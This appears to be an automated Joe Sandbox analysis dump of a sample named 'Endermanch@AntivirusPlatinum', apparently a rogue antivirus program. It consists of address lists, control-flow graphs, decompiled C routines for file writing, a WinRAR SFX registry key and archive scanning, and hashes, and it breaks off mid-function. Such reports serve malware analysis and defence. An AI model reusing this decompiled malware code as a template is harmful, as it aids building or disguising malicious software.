                                                                                                                                                  0x0040c5f4
                                                                                                                                                  0x0040c5f4
                                                                                                                                                  0x0040c5fa
                                                                                                                                                  0x0040c600
                                                                                                                                                  0x0040c601
                                                                                                                                                  0x0040c607
                                                                                                                                                  0x0040c608
                                                                                                                                                  0x0040c609
                                                                                                                                                  0x0040c60b
                                                                                                                                                  0x0040c60e
                                                                                                                                                  0x0040c614
                                                                                                                                                  0x0040c615
                                                                                                                                                  0x0040c617
                                                                                                                                                  0x0040c61a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5f1
                                                                                                                                                  0x0040c5f1
                                                                                                                                                  0x0040c61c
                                                                                                                                                  0x0040c628
                                                                                                                                                  0x0040c62e
                                                                                                                                                  0x0040c635
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c63b
                                                                                                                                                  0x0040c63b
                                                                                                                                                  0x0040c642
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c648
                                                                                                                                                  0x0040c64a
                                                                                                                                                  0x0040c651
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c65d
                                                                                                                                                  0x0040c65f
                                                                                                                                                  0x0040c69f
                                                                                                                                                  0x0040c69f
                                                                                                                                                  0x0040c6a6
                                                                                                                                                  0x0040c6af
                                                                                                                                                  0x0040c6bb
                                                                                                                                                  0x0040c6c9
                                                                                                                                                  0x0040c6c9
                                                                                                                                                  0x0040c6d5
                                                                                                                                                  0x0040c6e3
                                                                                                                                                  0x0040c6ed
                                                                                                                                                  0x0040c6f4
                                                                                                                                                  0x0040c6fa
                                                                                                                                                  0x0040c6fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c703
                                                                                                                                                  0x0040c703
                                                                                                                                                  0x0040c705
                                                                                                                                                  0x0040c705
                                                                                                                                                  0x0040c70a
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c716
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c716
                                                                                                                                                  0x0040c6fd
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x0040c66a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c66c
                                                                                                                                                  0x0040c674
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c676
                                                                                                                                                  0x0040c676
                                                                                                                                                  0x0040c677
                                                                                                                                                  0x0040c67f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x0040c683
                                                                                                                                                  0x0040c68b
                                                                                                                                                  0x0040c692
                                                                                                                                                  0x0040c697
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c745
                                                                                                                                                  0x0040c745
                                                                                                                                                  0x0040c749
                                                                                                                                                  0x0040c74b
                                                                                                                                                  0x0040c752
                                                                                                                                                  0x0040c75e
                                                                                                                                                  0x0040c75e
                                                                                                                                                  0x0040c764
                                                                                                                                                  0x0040c76c
                                                                                                                                                  0x0040c76c
                                                                                                                                                  0x0040c771
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c77d
                                                                                                                                                  0x0040c77d
                                                                                                                                                  0x0040c781
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c5a9
                                                                                                                                                  0x0040c5af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ca1d
                                                                                                                                                  0x0040ca1d
                                                                                                                                                  0x0040ca21
                                                                                                                                                  0x0040ca23
                                                                                                                                                  0x0040ca23
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c563
                                                                                                                                                  0x0040c568
                                                                                                                                                  0x0040c56b
                                                                                                                                                  0x0040c591
                                                                                                                                                  0x0040c56d
                                                                                                                                                  0x0040c56d
                                                                                                                                                  0x0040c570
                                                                                                                                                  0x0040c585
                                                                                                                                                  0x0040c572
                                                                                                                                                  0x0040c572
                                                                                                                                                  0x0040c579
                                                                                                                                                  0x0040c579
                                                                                                                                                  0x0040c570
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c008
                                                                                                                                                  0x0040c00c
                                                                                                                                                  0x0040c011
                                                                                                                                                  0x0040c018
                                                                                                                                                  0x0040c018
                                                                                                                                                  0x0040c01b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c01d
                                                                                                                                                  0x0040c01b
                                                                                                                                                  0x0040ca58
                                                                                                                                                  0x0040ca5c
                                                                                                                                                  0x0040ca5c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c97b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7fc

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040A250: OemToCharBuffA.USER32 ref: 0040A25E
                                                                                                                                                    • Part of subcall function 0040A250: CharUpperA.USER32(00000000,?,?,0040B53D,?,00000000,00000000,766861F0,00000000,00000000), ref: 0040A269
                                                                                                                                                    • Part of subcall function 0040A250: CharToOemBuffA.USER32 ref: 0040A27C
                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00000001,00000000,00000000), ref: 0040CA15
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Char$Buff$ChangeNotifyUpper
                                                                                                                                                  • String ID: $"$.lnk$/$/
                                                                                                                                                  • API String ID: 3722132714-4221205064
                                                                                                                                                  • Opcode ID: 27bf3f6fec95a07f86dd67e8e14781f846cc3590ad8cb4fe44e6cc38865bcf63
                                                                                                                                                  • Instruction ID: ac79738b4ffa8067dea208a906377ff97dd7469831f8120efdd6494ba044edeb
                                                                                                                                                  • Opcode Fuzzy Hash: 27bf3f6fec95a07f86dd67e8e14781f846cc3590ad8cb4fe44e6cc38865bcf63
                                                                                                                                                  • Instruction Fuzzy Hash: AB7181B290525CA9EB21E7A0CD85BDAB7BC9B04304F0445F7A145F6182DB78AB88CF59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1442 405585-405590 1443 405685-405687 1442->1443 1444 405596-40559b 1442->1444 1445 4055b2-4055b9 1444->1445 1446 40559d-40559e 1444->1446 1449 4055ba-4055c2 1445->1449 1447 4055a0-4055a1 1446->1447 1448 4055a7 1446->1448 1447->1445 1450 4055a3-4055a5 1447->1450 1451 4055a9-4055af GetStdHandle 1448->1451 1452 405601-405616 WriteFile 1449->1452 1453 4055c4-4055c7 1449->1453 1450->1451 1451->1445 1454 405618-40561a 1452->1454 1455 4055c9-4055d5 1453->1455 1456 40561c-405620 1453->1456 1454->1456 1457 40567f-405684 1454->1457 1459 4055d7 1455->1459 1460 4055d9-4055f2 WriteFile 1455->1460 1456->1457 1458 405622-405626 1456->1458 1457->1443 1458->1457 1461 405628-40563c call 403304 1458->1461 1459->1460 1460->1456 1462 4055f4-4055fd 1460->1462 1466 405672-40567a call 403471 1461->1466 1467 40563e-405644 1461->1467 1462->1455 1464 4055ff 1462->1464 1464->1454 1466->1457 1467->1449 1468 40564a-40564c 1467->1468 1468->1449 1470 405652-40566d call 404fdc call 4054ed 1468->1470 1470->1449
                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E00405585(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				long _t32;
                                                                                                                                                  				int _t35;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				void* _t40;
                                                                                                                                                  				long _t48;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				struct _OVERLAPPED* _t55;
                                                                                                                                                  				void* _t60;
                                                                                                                                                  
                                                                                                                                                  				_t53 = __edx;
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t60 = __ecx;
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					L25:
                                                                                                                                                  					return _t24;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 =  *(__ecx + 0xc);
                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                  					L7:
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t55 = 0;
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  						if( *((intOrPtr*)(_t60 + 0xc)) == 0) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a8 <= 0) {
                                                                                                                                                  							L17:
                                                                                                                                                  							if( *((char*)(_t60 + 0x14)) == 0 ||  *((intOrPtr*)(_t60 + 0xc)) != 0) {
                                                                                                                                                  								L24:
                                                                                                                                                  								 *((char*)(_t60 + 8)) = 1;
                                                                                                                                                  								goto L25;
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(0);
                                                                                                                                                  								_t18 = _t60 + 0x17; // 0x17
                                                                                                                                                  								if(E00403304(0x414c7c, _t18) == 0) {
                                                                                                                                                  									_t22 = _t60 + 0x17; // 0x17
                                                                                                                                                  									_t24 = E00403471(0x414c7c, 0, _t22);
                                                                                                                                                  									goto L24;
                                                                                                                                                  								}
                                                                                                                                                  								_t19 =  &_v8; // 0x9454529
                                                                                                                                                  								_t24 =  *_t19;
                                                                                                                                                  								if(_t24 < _a8 && _t24 > 0) {
                                                                                                                                                  									_t38 = E00404FDC(_t60, _t53);
                                                                                                                                                  									_t21 =  &_v8; // 0x9454529
                                                                                                                                                  									asm("sbb edx, edi");
                                                                                                                                                  									_t24 = E004054ED(_t60, _t38 -  *_t21, _t53, 0);
                                                                                                                                                  								}
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L10:
                                                                                                                                                  							_t48 = _a8 - _t55;
                                                                                                                                                  							_t32 = 0x4000;
                                                                                                                                                  							if(_t48 < 0x4000) {
                                                                                                                                                  								_t32 = _t48;
                                                                                                                                                  							}
                                                                                                                                                  							_t8 =  &_v8; // 0x9454529
                                                                                                                                                  							_t35 = WriteFile( *(_t60 + 4), _a4 + _t55, _t32, _t8, 0);
                                                                                                                                                  							asm("sbb al, al");
                                                                                                                                                  							_t24 =  ~(_t35 - 1) + 1;
                                                                                                                                                  							if(_t24 == 0) {
                                                                                                                                                  								goto L17;
                                                                                                                                                  							}
                                                                                                                                                  							_t55 = _t55 + 0x4000;
                                                                                                                                                  							if(_t55 < _a8) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							L16:
                                                                                                                                                  							if(_t24 != 0) {
                                                                                                                                                  								goto L24;
                                                                                                                                                  							}
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						goto L17;
                                                                                                                                                  						L15:
                                                                                                                                                  						_t12 =  &_v8; // 0x9454529
                                                                                                                                                  						_t26 = WriteFile( *(_t60 + 4), _a4, _a8, _t12, 0); // executed
                                                                                                                                                  						asm("sbb al, al");
                                                                                                                                                  						_t24 =  ~(_t26 - 1) + 1;
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t40 = _t24 - 1;
                                                                                                                                                  				if(_t40 == 0) {
                                                                                                                                                  					_t24 = GetStdHandle(0xfffffff5);
                                                                                                                                                  					L6:
                                                                                                                                                  					 *(_t60 + 4) = _t24;
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = _t40 - 1;
                                                                                                                                                  				if(_t24 != 0) {
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				_t24 = GetStdHandle(0xfffffff4);
                                                                                                                                                  				goto L6;
                                                                                                                                                  			}














                                                                                                                                                  0x00405585
                                                                                                                                                  0x00405588
                                                                                                                                                  0x0040558e
                                                                                                                                                  0x00405590
                                                                                                                                                  0x00405685
                                                                                                                                                  0x00405687
                                                                                                                                                  0x00405687
                                                                                                                                                  0x00405596
                                                                                                                                                  0x0040559b
                                                                                                                                                  0x004055b2
                                                                                                                                                  0x004055ba
                                                                                                                                                  0x004055ba
                                                                                                                                                  0x004055bc
                                                                                                                                                  0x004055c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055c7
                                                                                                                                                  0x0040561c
                                                                                                                                                  0x00405620
                                                                                                                                                  0x0040567f
                                                                                                                                                  0x00405680
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405628
                                                                                                                                                  0x00405628
                                                                                                                                                  0x0040562a
                                                                                                                                                  0x0040563c
                                                                                                                                                  0x00405672
                                                                                                                                                  0x0040567a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040567a
                                                                                                                                                  0x0040563e
                                                                                                                                                  0x0040563e
                                                                                                                                                  0x00405644
                                                                                                                                                  0x00405656
                                                                                                                                                  0x0040565b
                                                                                                                                                  0x00405662
                                                                                                                                                  0x00405668
                                                                                                                                                  0x00405668
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405644
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055c9
                                                                                                                                                  0x004055c9
                                                                                                                                                  0x004055cc
                                                                                                                                                  0x004055ce
                                                                                                                                                  0x004055d5
                                                                                                                                                  0x004055d7
                                                                                                                                                  0x004055d7
                                                                                                                                                  0x004055db
                                                                                                                                                  0x004055e9
                                                                                                                                                  0x004055ee
                                                                                                                                                  0x004055f0
                                                                                                                                                  0x004055f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055f4
                                                                                                                                                  0x004055fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405618
                                                                                                                                                  0x0040561a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040561a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405601
                                                                                                                                                  0x00405602
                                                                                                                                                  0x0040560f
                                                                                                                                                  0x00405614
                                                                                                                                                  0x00405616
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405616
                                                                                                                                                  0x004055ba
                                                                                                                                                  0x0040559d
                                                                                                                                                  0x0040559e
                                                                                                                                                  0x004055a9
                                                                                                                                                  0x004055a9
                                                                                                                                                  0x004055af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055af
                                                                                                                                                  0x004055a0
                                                                                                                                                  0x004055a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055a9
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00409250,?,?,00000000,?,?,0040EA1F,?,?,09454529,?,?), ref: 004055A9
                                                                                                                                                  • WriteFile.KERNEL32(?,?,00004000,)EE*)))*))),00000000,00000000,?,00000000,00000017,00000000,?,00409250,?,?,00000000,?), ref: 004055E9
                                                                                                                                                  • WriteFile.KERNELBASE(?,?,00000000,)EE*)))*))),00000000,?,?,?,00000000,?,00409250,?,?,00000000,?,?), ref: 0040560F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                                                  • String ID: )EE*)))*)))$|LA
                                                                                                                                                  • API String ID: 4209713984-4270601557
                                                                                                                                                  • Opcode ID: fdc6627f0debecb945da0017f8ab991c878f152bbffab1a315f051c33c973c2c
                                                                                                                                                  • Instruction ID: 699b0b7827fd0117c3666501287c6da654fc132a3aa7f220188452afde949247
                                                                                                                                                  • Opcode Fuzzy Hash: fdc6627f0debecb945da0017f8ab991c878f152bbffab1a315f051c33c973c2c
                                                                                                                                                  • Instruction Fuzzy Hash: 9331A371600908BBEF20DA25CD44FBF77AAEB90710F14852BA51AE62D0CB39A901CF19
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1475 40b92f-40b941 1476 40b943-40b949 1475->1476 1477 40b9ab-40b9ad 1475->1477 1476->1477 1478 40b94b-40b980 call 40b901 RegCreateKeyExA 1476->1478 1478->1477 1481 40b982-40b9a5 call 40a384 RegSetValueExA RegCloseKey 1478->1481 1481->1477
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B92F(void* __esi, char* _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				char _v1036;
                                                                                                                                                  				long _t9;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                  
                                                                                                                                                  				_t23 =  *0x419f90; // 0x1
                                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                                  					_t24 =  *0x418ed0; // 0x43
                                                                                                                                                  					if(_t24 != 0) {
                                                                                                                                                  						E0040B901( &_v1036, "C:\WINDOWS");
                                                                                                                                                  						_t9 = RegCreateKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12); // executed
                                                                                                                                                  						if(_t9 == 0) {
                                                                                                                                                  							RegSetValueExA(_v8,  &_v1036, 0, 1, _a4, E0040A384(_t19, _a4) + 1); // executed
                                                                                                                                                  							return RegCloseKey(_v8);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t9;
                                                                                                                                                  			}










                                                                                                                                                  0x0040b93b
                                                                                                                                                  0x0040b941
                                                                                                                                                  0x0040b943
                                                                                                                                                  0x0040b949
                                                                                                                                                  0x0040b957
                                                                                                                                                  0x0040b977
                                                                                                                                                  0x0040b980
                                                                                                                                                  0x0040b99c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b9a5
                                                                                                                                                  0x0040b980
                                                                                                                                                  0x0040b949
                                                                                                                                                  0x0040b9ad

                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExA.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\WINDOWS,?,00000000), ref: 0040B977
                                                                                                                                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000001,?), ref: 0040B99C
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040B9A5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                  • String ID: C:\WINDOWS$Software\WinRAR SFX
                                                                                                                                                  • API String ID: 1818849710-3781130125
                                                                                                                                                  • Opcode ID: 05266ae45888556376a699e29cc3aa24ec337e56163e73755cf98153071eefaa
                                                                                                                                                  • Instruction ID: c16daf66e710161b54d0a2fba0aebfabfb44711b4487a502893ad39a1af73d28
                                                                                                                                                  • Opcode Fuzzy Hash: 05266ae45888556376a699e29cc3aa24ec337e56163e73755cf98153071eefaa
                                                                                                                                                  • Instruction Fuzzy Hash: DD016DB1400218BEEB21DB90DD81EEB7F2DEB04388F004176BB01F10A1D7B55E55D6AD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1484 409293-4092a6 call 401200 1487 4092ad-4092b5 1484->1487 1488 4092a8 call 40a3ad 1484->1488 1489 4092b7-4092d5 GetModuleFileNameA call 40a3d9 1487->1489 1490 4092dc-40930b call 40a477 call 404ec3 call 405097 1487->1490 1488->1487 1496 4094ca-4094cc 1489->1496 1497 4092db 1489->1497 1501 40931d-409324 1490->1501 1502 40930d-409318 call 405074 1490->1502 1497->1490 1504 409325-409329 1501->1504 1509 4094c9 1502->1509 1506 409401-40942e call 4054ed call 40a1ec 1504->1506 1507 40932f-40934f call 404fdc call 40568a 1504->1507 1517 409434-409451 call 40568a 1506->1517 1518 4094bd-4094c8 call 405074 1506->1518 1516 409354-40935a 1507->1516 1509->1496 1516->1518 1519 409360 1516->1519 1530 409453-40945c 1517->1530 1531 4094b4-4094ba 1517->1531 1518->1509 1520 409362-40936c 1519->1520 1523 409390-409393 1520->1523 1524 40936e-409376 1520->1524 1528 409395-40939d 1523->1528 1529 4093bb-4093c4 1523->1529 1524->1523 1527 409378-40938e call 40a53d 1524->1527 1527->1523 1541 4093c8-4093cd 1527->1541 1528->1529 1533 40939f-4093b5 call 40a53d 1528->1533 1529->1520 1535 4093c6 1529->1535 1530->1531 1534 40945e-409461 1530->1534 1531->1518 1533->1518 1533->1529 1538 409463-40946a 1534->1538 1539 40949e-4094a1 1534->1539 1540 4093d0-4093f1 call 4054ed 1535->1540 1545 409497 1538->1545 1546 40946c-40946f 1538->1546 1542 4094a3-4094a6 1539->1542 1543 4094a8-4094aa 1539->1543 1540->1504 1553 4093f7-4093fb 1540->1553 1541->1540 1542->1543 1549 4094ab 1542->1549 1543->1549 1548 40949b-40949c 1545->1548 1550 409491-409495 1546->1550 1551 409471-409474 1546->1551 1554 4094ae-4094b2 1548->1554 1549->1554 1550->1548 1555 409476-409479 1551->1555 1556 40948b-40948f 1551->1556 1553->1506 1553->1518 1554->1530 1554->1531 1557 409485-409489 1555->1557 1558 40947b-40947d 1555->1558 1556->1548 1557->1548 1558->1549 1559 40947f-409483 1558->1559 1559->1548
                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E00409293(char __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				char _v1040;
                                                                                                                                                  				char _v4144;
                                                                                                                                                  				char _v12336;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr _t79;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				char _t95;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				char _t111;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				void* _t117;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				intOrPtr* _t125;
                                                                                                                                                  				void* _t127;
                                                                                                                                                  
                                                                                                                                                  				_t110 = __edx;
                                                                                                                                                  				_t97 = __ecx;
                                                                                                                                                  				_t95 = __ebx;
                                                                                                                                                  				E00401200(0x302c);
                                                                                                                                                  				 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                  				_push(_a4);
                                                                                                                                                  				_t125 = __ecx;
                                                                                                                                                  				_t65 = E0040A3AD();
                                                                                                                                                  				_t66 =  &_v1040;
                                                                                                                                                  				if(_t65 != 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					E0040A477(_t66, _a4);
                                                                                                                                                  					E00404EC3( &_v4144);
                                                                                                                                                  					_t70 = E00405097( &_v4144,  &_v1040, 0, 1, 0); // executed
                                                                                                                                                  					if(_t70 != 0) {
                                                                                                                                                  						_a4 = _a4 | 0xffffffff;
                                                                                                                                                  						_v8 = 0;
                                                                                                                                                  						_push(_t95);
                                                                                                                                                  						L7:
                                                                                                                                                  						while(_a4 == 0xffffffff) {
                                                                                                                                                  							_t80 = E00404FDC( &_v4144, _t110); // executed
                                                                                                                                                  							_v12 = _t80;
                                                                                                                                                  							_t82 = E0040568A( &_v4144, _t110,  &_v12336, 0x2000); // executed
                                                                                                                                                  							_v16 = _t82;
                                                                                                                                                  							if(_t82 >= 0x10) {
                                                                                                                                                  								_t122 = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                  									if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A53D(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A53D(_t127 + _t122 - 0x302a, 0x412570, 4) != 0) {
                                                                                                                                                  										_t122 = _t122 + 1;
                                                                                                                                                  										if(_t122 <= _v16 + 0xfffffff0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										} else {
                                                                                                                                                  											L19:
                                                                                                                                                  											E004054ED( &_v4144, _v16 + _v12 - 0x10, 0, 0);
                                                                                                                                                  											_v8 = _v8 + 1;
                                                                                                                                                  											if(_v8 < 0x40) {
                                                                                                                                                  												goto L7;
                                                                                                                                                  											} else {
                                                                                                                                                  												if(_a4 != 0xffffffff) {
                                                                                                                                                  													goto L21;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L42;
                                                                                                                                                  								}
                                                                                                                                                  								_a4 = _t122 + _v12;
                                                                                                                                                  								goto L19;
                                                                                                                                                  							}
                                                                                                                                                  							L42:
                                                                                                                                                  							_t76 = E00405074(_t95,  &_v4144);
                                                                                                                                                  							goto L43;
                                                                                                                                                  						}
                                                                                                                                                  						L21:
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						_t95 = 0;
                                                                                                                                                  						 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                  						E004054ED( &_v4144, _a4, _t110, 0);
                                                                                                                                                  						_t75 = E0040A1EC( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                  						 *_t125 = _t75;
                                                                                                                                                  						if(_t75 != 0) {
                                                                                                                                                  							 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
